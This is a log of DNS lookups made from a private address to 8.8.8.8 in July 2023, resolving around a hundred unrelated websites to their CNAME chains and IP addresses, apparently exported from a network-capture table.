                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.850790977 CEST8.8.8.8192.168.2.40xcddaNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.850790977 CEST8.8.8.8192.168.2.40xcddaNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.900688887 CEST8.8.8.8192.168.2.40xbfccNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.900688887 CEST8.8.8.8192.168.2.40xbfccNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.961401939 CEST8.8.8.8192.168.2.40x2b4cNo error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.961401939 CEST8.8.8.8192.168.2.40x2b4cNo error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.967169046 CEST8.8.8.8192.168.2.40xe982No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.967169046 CEST8.8.8.8192.168.2.40xe982No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.967169046 CEST8.8.8.8192.168.2.40xe982No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.049437046 CEST8.8.8.8192.168.2.40x2472No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.065709114 CEST8.8.8.8192.168.2.40x6db7No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.181829929 CEST8.8.8.8192.168.2.40x7862No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.229665995 CEST8.8.8.8192.168.2.40x50aeNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.229665995 CEST8.8.8.8192.168.2.40x50aeNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.385149956 CEST8.8.8.8192.168.2.40xcdf1No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.385149956 CEST8.8.8.8192.168.2.40xcdf1No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.436470032 CEST8.8.8.8192.168.2.40xaab7No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.436470032 CEST8.8.8.8192.168.2.40xaab7No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.436470032 CEST8.8.8.8192.168.2.40xaab7No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.455657005 CEST8.8.8.8192.168.2.40x31aaNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.455657005 CEST8.8.8.8192.168.2.40x31aaNo error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.458498001 CEST8.8.8.8192.168.2.40x2decNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.458498001 CEST8.8.8.8192.168.2.40x2decNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.482084036 CEST8.8.8.8192.168.2.40x9638No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.522044897 CEST8.8.8.8192.168.2.40x5377No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545778990 CEST8.8.8.8192.168.2.40x56afNo error (0)www.pdqhomes.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545778990 CEST8.8.8.8192.168.2.40x56afNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545778990 CEST8.8.8.8192.168.2.40x56afNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545778990 CEST8.8.8.8192.168.2.40x56afNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545933008 CEST8.8.8.8192.168.2.40x56afNo error (0)www.pdqhomes.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545933008 CEST8.8.8.8192.168.2.40x56afNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545933008 CEST8.8.8.8192.168.2.40x56afNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.545933008 CEST8.8.8.8192.168.2.40x56afNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.691333055 CEST8.8.8.8192.168.2.40xf44fNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.691333055 CEST8.8.8.8192.168.2.40xf44fNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.831738949 CEST8.8.8.8192.168.2.40x7250No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.831738949 CEST8.8.8.8192.168.2.40x7250No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.831738949 CEST8.8.8.8192.168.2.40x7250No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.831738949 CEST8.8.8.8192.168.2.40x7250No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.831738949 CEST8.8.8.8192.168.2.40x7250No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.859522104 CEST8.8.8.8192.168.2.40x5a0fNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.914675951 CEST8.8.8.8192.168.2.40x30d6No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.914675951 CEST8.8.8.8192.168.2.40x30d6No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.914675951 CEST8.8.8.8192.168.2.40x30d6No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:34.969151974 CEST8.8.8.8192.168.2.40x746dNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.102463961 CEST8.8.8.8192.168.2.40xe587No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.229020119 CEST8.8.8.8192.168.2.40xd1a2No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.229020119 CEST8.8.8.8192.168.2.40xd1a2No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.229020119 CEST8.8.8.8192.168.2.40xd1a2No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.347304106 CEST8.8.8.8192.168.2.40x6d3cNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.347304106 CEST8.8.8.8192.168.2.40x6d3cNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.358314037 CEST8.8.8.8192.168.2.40x294fName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.369148016 CEST8.8.8.8192.168.2.40xf962No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.708074093 CEST8.8.8.8192.168.2.40xa290No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.719415903 CEST8.8.8.8192.168.2.40xc43dNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.719415903 CEST8.8.8.8192.168.2.40xc43dNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.719415903 CEST8.8.8.8192.168.2.40xc43dNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.812318087 CEST8.8.8.8192.168.2.40xc648No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.812318087 CEST8.8.8.8192.168.2.40xc648No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.826776981 CEST8.8.8.8192.168.2.40x5877No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.839076042 CEST8.8.8.8192.168.2.40x8897No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.839076042 CEST8.8.8.8192.168.2.40x8897No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.847572088 CEST8.8.8.8192.168.2.40x7cc0No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.847572088 CEST8.8.8.8192.168.2.40x7cc0No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.866615057 CEST8.8.8.8192.168.2.40x3f5bNo error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.866615057 CEST8.8.8.8192.168.2.40x3f5bNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.866615057 CEST8.8.8.8192.168.2.40x3f5bNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.866615057 CEST8.8.8.8192.168.2.40x3f5bNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.875426054 CEST8.8.8.8192.168.2.40x8e86No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.875426054 CEST8.8.8.8192.168.2.40x8e86No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.936208963 CEST8.8.8.8192.168.2.40x1df0No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.936208963 CEST8.8.8.8192.168.2.40x1df0No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.936208963 CEST8.8.8.8192.168.2.40x1df0No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:35.936208963 CEST8.8.8.8192.168.2.40x1df0No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.159255981 CEST8.8.8.8192.168.2.40xb375No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.159255981 CEST8.8.8.8192.168.2.40xb375No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.207618952 CEST8.8.8.8192.168.2.40xbf04No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.207618952 CEST8.8.8.8192.168.2.40xbf04No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.282552004 CEST8.8.8.8192.168.2.40x8975No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.282552004 CEST8.8.8.8192.168.2.40x8975No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.282552004 CEST8.8.8.8192.168.2.40x8975No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.367322922 CEST8.8.8.8192.168.2.40x6578No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.497586012 CEST8.8.8.8192.168.2.40x5fbcNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.497586012 CEST8.8.8.8192.168.2.40x5fbcNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:36.799448967 CEST8.8.8.8192.168.2.40x1c0fNo error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.099617958 CEST8.8.8.8192.168.2.40x618eNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.116353035 CEST8.8.8.8192.168.2.40x1a8No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.116843939 CEST8.8.8.8192.168.2.40x1c95No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.116843939 CEST8.8.8.8192.168.2.40x1c95No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.119524002 CEST8.8.8.8192.168.2.40x9d26Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.150950909 CEST8.8.8.8192.168.2.40x2f23No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.150950909 CEST8.8.8.8192.168.2.40x2f23No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.259818077 CEST8.8.8.8192.168.2.40xada8No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.277569056 CEST8.8.8.8192.168.2.40x6c89No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.322535038 CEST8.8.8.8192.168.2.40xb3cbNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.349761963 CEST8.8.8.8192.168.2.40x5b1fNo error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.349761963 CEST8.8.8.8192.168.2.40x5b1fNo error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.719263077 CEST8.8.8.8192.168.2.40xf456No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.719263077 CEST8.8.8.8192.168.2.40xf456No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.797247887 CEST8.8.8.8192.168.2.40xe981No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:37.934998989 CEST8.8.8.8192.168.2.40x587bNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.005536079 CEST8.8.8.8192.168.2.40x24beNo error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.079915047 CEST8.8.8.8192.168.2.40x1d2No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.376862049 CEST8.8.8.8192.168.2.40xb0e3No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.390307903 CEST8.8.8.8192.168.2.40x8c67No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.390307903 CEST8.8.8.8192.168.2.40x8c67No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.429724932 CEST8.8.8.8192.168.2.40x1edcNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.550791979 CEST8.8.8.8192.168.2.40x35efNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.552757978 CEST8.8.8.8192.168.2.40x2be3No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.943008900 CEST8.8.8.8192.168.2.40x89eNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.943008900 CEST8.8.8.8192.168.2.40x89eNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.943008900 CEST8.8.8.8192.168.2.40x89eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:38.990078926 CEST8.8.8.8192.168.2.40x3c5eNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.056798935 CEST8.8.8.8192.168.2.40x9f2fNo error (0)www.netcr.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.056798935 CEST8.8.8.8192.168.2.40x9f2fNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.056798935 CEST8.8.8.8192.168.2.40x9f2fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.056798935 CEST8.8.8.8192.168.2.40x9f2fNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.489373922 CEST8.8.8.8192.168.2.40x9d5aNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.489373922 CEST8.8.8.8192.168.2.40x9d5aNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:39.983535051 CEST8.8.8.8192.168.2.40x95e1No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.421118021 CEST8.8.8.8192.168.2.40xd6efNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.562242031 CEST8.8.8.8192.168.2.40x19dbNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:40.664747953 CEST8.8.8.8192.168.2.40x1abeNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.043802977 CEST8.8.8.8192.168.2.40x8d16No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.043802977 CEST8.8.8.8192.168.2.40x8d16No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.046987057 CEST8.8.8.8192.168.2.40x3abfNo error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.046987057 CEST8.8.8.8192.168.2.40x3abfNo error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.046987057 CEST8.8.8.8192.168.2.40x3abfNo error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.722309113 CEST8.8.8.8192.168.2.40x3c0cNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.722309113 CEST8.8.8.8192.168.2.40x3c0cNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.722309113 CEST8.8.8.8192.168.2.40x3c0cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.722309113 CEST8.8.8.8192.168.2.40x3c0cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.745157957 CEST8.8.8.8192.168.2.40x3c0cNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.745157957 CEST8.8.8.8192.168.2.40x3c0cNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.745157957 CEST8.8.8.8192.168.2.40x3c0cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.745157957 CEST8.8.8.8192.168.2.40x3c0cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:41.756424904 CEST8.8.8.8192.168.2.40x4ed2No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:42.314317942 CEST8.8.8.8192.168.2.40x24f4No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:42.685919046 CEST8.8.8.8192.168.2.40xf580No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:42.685919046 CEST8.8.8.8192.168.2.40xf580No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.578183889 CEST8.8.8.8192.168.2.40x650No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
